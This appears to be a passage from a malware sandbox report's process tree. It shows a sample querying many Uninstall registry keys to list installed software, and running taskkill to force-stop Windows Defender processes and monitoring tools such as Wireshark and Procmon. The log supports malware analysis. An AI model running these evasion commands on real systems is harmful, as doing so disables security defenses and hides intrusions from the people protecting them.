C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:1508
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1512
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵PID:1772
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵PID:1568
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1392
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵PID:832
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵PID:1836
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:1044
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1400
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵PID:1892
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵PID:1412
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1608
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵PID:1936
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵PID:1556
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1492
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵PID:992
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵PID:1172
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2016
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵PID:1748
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵PID:1472
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:832
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵PID:1876
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵PID:1852
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:684
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1368
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵PID:1172
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵PID:1408
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1836
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵PID:1840
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵PID:1884
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:764
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:643⤵PID:1604
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:323⤵PID:1516
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1472
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵PID:300
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵PID:812
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:1776
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:676
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵PID:1740
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵PID:2008
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1380
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵PID:1128
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵PID:1176
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2020
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:643⤵PID:2040
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:323⤵PID:1876
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1600
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2032
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵PID:1748
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵PID:2028
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1392
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵PID:1120
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵PID:1436
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1468
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:643⤵PID:1680
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:323⤵PID:1400
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1688
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵PID:812
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵PID:2008
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:300
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1188
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵PID:1752
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵PID:1012
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:844
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵PID:2036
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵PID:1852
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1876
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:643⤵PID:1748
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:323⤵PID:2028
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1604
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:643⤵PID:1464
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:323⤵PID:1672
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1860
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:684
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:643⤵PID:872
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:323⤵PID:2016
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1368
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:643⤵PID:1880
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:323⤵PID:1380
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1476
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:643⤵PID:1152
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:323⤵PID:400
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1768
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:643⤵PID:1128
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:323⤵PID:1864
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1576
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:643⤵PID:316
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:323⤵PID:1852
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1840
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:643⤵PID:1372
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:323⤵PID:1256
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1600
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1464
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:643⤵PID:1672
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:323⤵PID:2016
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2032
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:643⤵PID:1756
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:323⤵PID:832
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1744
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:643⤵PID:1964
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:323⤵PID:812
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1548
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:643⤵PID:1152
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:323⤵PID:400
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:460
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:643⤵PID:476
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:323⤵PID:300
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2040
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:643⤵PID:316
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:323⤵PID:1120
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1832
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:643⤵PID:1504
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:323⤵PID:1632
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1772
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:643⤵PID:1920
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:323⤵PID:2004
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1872
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:643⤵PID:440
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:323⤵PID:1488
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1232
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:643⤵PID:1072
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:323⤵PID:1392
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1836
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:643⤵PID:1896
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:323⤵PID:1408
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1756
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:643⤵PID:1556
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:323⤵PID:1152
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1880
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1660
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:643⤵PID:300
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:323⤵PID:1748
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1120
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵PID:1256
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵PID:1400
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2012
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵PID:1920
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵PID:1116
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1508
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵PID:1488
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵PID:2040
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1872
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:643⤵PID:1240
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:323⤵PID:1772
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1364
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵PID:1576
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵PID:1608
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1876
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:643⤵PID:324
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:323⤵PID:1476
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1172
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵PID:684
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵PID:568
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1688
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵PID:1472
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵PID:1392
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1468
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵PID:1896
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵PID:832
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2008
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵PID:1556
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵PID:1864
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1128
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵PID:1740
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵PID:1544
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:812
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵PID:316
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵PID:1504
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1256
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵PID:992
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵PID:1212
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1116
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:643⤵PID:1492
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:323⤵PID:1956
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:676
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2032
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:643⤵PID:1608
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:323⤵PID:324
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1844
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:643⤵PID:684
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:323⤵PID:1936
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:764
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵PID:1392
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵PID:1600
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1380
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵PID:1152
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵PID:1556
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1972
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵PID:1176
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵PID:1544
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1672
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:1488
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:1608
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:1244
-